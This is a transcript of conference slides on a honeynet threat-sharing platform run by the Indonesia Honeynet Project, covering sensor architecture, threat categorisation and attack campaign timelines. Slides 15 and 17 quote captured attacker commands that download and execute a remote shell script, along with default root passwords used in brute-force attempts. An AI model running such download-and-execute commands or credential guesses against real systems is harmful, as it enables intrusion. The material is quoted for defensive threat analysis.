Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10....
Transcript of Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10....
![Page 1: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/1.jpg)
Honeynet Threat Sharing Platform
Dr. Charles Lim, CTIA, EDRP, CHFI, ECSA, ECSP, ECIH, CEH, CEI
Swiss German University
9th September 2020
![Page 2: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/2.jpg)
About Me
Dr. Charles Lim, Msc., CTIA, CHFI, EDRP, ECSA, ECSP, ECIH, CEH, CEIHead of Cyber Security Laboratory (now Security Operation Center)Researcher – Information Security Research Group and LecturerSwiss German UniversityCharles.lims [at] gmail.com and charles.lim [at] sgu.ac.idhttp://people.sgu.ac.id/charleslim
Research Interest
• Malware• Intrusion Detection• Vulnerability Analysis• Digital Forensics• Cloud Security
Community
Indonesia Honeynet Project - Chapter LeadAcademy CSIRT – memberAsosiasi Forensik Digital Indonesia - member
![Page 3: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/3.jpg)
ISIF Asia Research Grant
Sept 2019
3
![Page 4: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/4.jpg)
Announcing – ISIF Asia Research Grant
4
SGU
IHPBSSN
![Page 5: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/5.jpg)
Agenda
• Honeypots
• Indonesia Honeynet Project Threat Map
• Threat Sharing Platform
• Honeypot-detected Threats
• Analyzing Campaign Timeline
• Research Output
• Q & A
![Page 6: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/6.jpg)
Honeypots
6
![Page 7: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/7.jpg)
Honeypots
• A decoy system to lure attacker to interact with it
• It emulates popular services, such as Web, SMB, SSH and others
• It is placed together with other network services
• It does not contain any useful information
![Page 8: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/8.jpg)
Honeypots in the network
![Page 9: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/9.jpg)
How Honeypot works
LINUX SERVER
![Page 10: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/10.jpg)
Indonesia Honeynet Project (IHP)
Threat Map
10
![Page 11: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/11.jpg)
Early Warning System (Honeynet Portal at BSSN)
11
![Page 12: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/12.jpg)
Threat Sharing PlatformArchitecture
12
![Page 13: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/13.jpg)
Honeynet Threat Sharing Platform (Architecture)
13
Send Logs, Malware and
sessions
HPFeedsHoneynet Parser
Engine
Honeypot Sensor Org A
Honeypot Sensor Org B
Honeypot Sensor Org C
Honeypot Sensor Org D
Logs Pulled and send to MISP
Cuckoo Sandbox Analysis
Malware samples send to Cuckoo
Send IOCs
Dashboard and ELK
Data Lake pulled to ELK
CSC-ISAC MISP Platform
Honeypot Logs send to Data Lake
Data Lake Arango DB
Analyze for any Threats
Security Analyst perform correlation and
investigation
Share investigated alert to MISP
Analyze Raw Data
![Page 14: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/14.jpg)
Exploring Honeypot Detected Threats
14
![Page 15: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/15.jpg)
Honeynet Threat Channels
15
Ho
ney
net
Cowrie
PeerIPAttacking IP Address:
35.202.41.48
LoggedinU: root P: root
Commands wgethttp://38.68.46.110/x86;
Dionaea
PeerIPAttacking IP address:
27.124.26.136
Connections URL: http://27.124.26.136:59486/tf.exe
Payload Hash: be7802ccf0e44b1d82567059a1abf83e
Services: SSH
Services: FTP, HTTP, Memcache, MSSQL, MySQL, SMB, TFTP, etc.
![Page 16: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/16.jpg)
Honeynet Threat Category (Cowrie) - Partial
16
![Page 17: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/17.jpg)
Honeynet Cowrie Threat Example
17
Attacking IP Address: 35.202.41.48
Shell Command Set: (SCSXXX)cd /tmp; wget http://37.49.224.100/zeros6x.sh; chmod 777 zeros6x.sh; ./zeros6x.sh
URLs:http://37.49.224.100/zeros6x.sh
Hash:f50da447e130d02cb8abc55b6bf7816878f276ece0ca739750adc1dca7c1ddc5
Credentials Used (multiple instances – user id : password):root : root123 | root : p@ssw0rd | root : 123 | root : password | root : 123456 | root : root
![Page 18: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/18.jpg)
Honeynet Cowrie Threat Category Example
18
Threat Categories (Shell Command Set - SCSXXX)
Commands Threat Category Mitre att&ck Technique
cd /tmp Usable Directory Discovery T1083 – File and Directory
Discovery
wget
http://37.49.224.1
00/zeros6x.sh;
Download Tools T1105, T843 – Remote File
Copy & Program Download
chmod 777
zeros6x.sh;
File Permission
Modification
T1222 - File and Directory
Permissions Modification
./zeros6x.sh Execution of Tools T1059 – Command & Scripting
Interpreter
![Page 19: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/19.jpg)
Threat Correlation (Virustotal Graph)
19
Other Possible Threats
in the chain
Threats usedto attack us
IP Address (Country)
![Page 20: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/20.jpg)
Our Threat SharingPlatform
(Dashboard)
20
![Page 21: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/21.jpg)
Public Dashboard
![Page 22: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/22.jpg)
Threat Category Monitoring
![Page 23: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/23.jpg)
Threat Pattern Monitoring
![Page 24: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/24.jpg)
AnalyzingCampaign Timeline
24
![Page 25: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/25.jpg)
Every Pattern has their Campaign Timeline
25
Pattern Code = SCS005 – Sys Profiling & Persistence
Heavy Attack PatternAttack “Campaign” is stopped
![Page 26: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/26.jpg)
Every Pattern has their Campaign Timeline
26
Pattern Code = SCS006 – Disable FW, Tool Execution & Persistence
Attack only exists in 10 – 13 May 2020
![Page 27: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/27.jpg)
Every Pattern has their Campaign Timeline
27
Pattern Code = SCS010 – Tool Execution and Covering Track
Attack exists in 24 May to 5 July 2020
![Page 28: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/28.jpg)
Similar Attack from same Threat Actor
28
Attacks on July 2020
Attacks on June 2020
Attacks on May 2020
![Page 29: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/29.jpg)
Our Research Output
29
![Page 30: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/30.jpg)
International Conference Paper (ICONETSI)
![Page 31: Honeynet Threat Sharing Platform · LINUX SERVER. Indonesia Honeynet Project (IHP) Threat Map 10. Early Warning System (Honeynet Portal at BSSN) 11. Threat Sharing Platform Architecture](https://reader034.fdocuments.in/reader034/viewer/2022052103/603dc91038aec347ed6137a3/html5/thumbnails/31.jpg)
Questions & Answers (Q&A)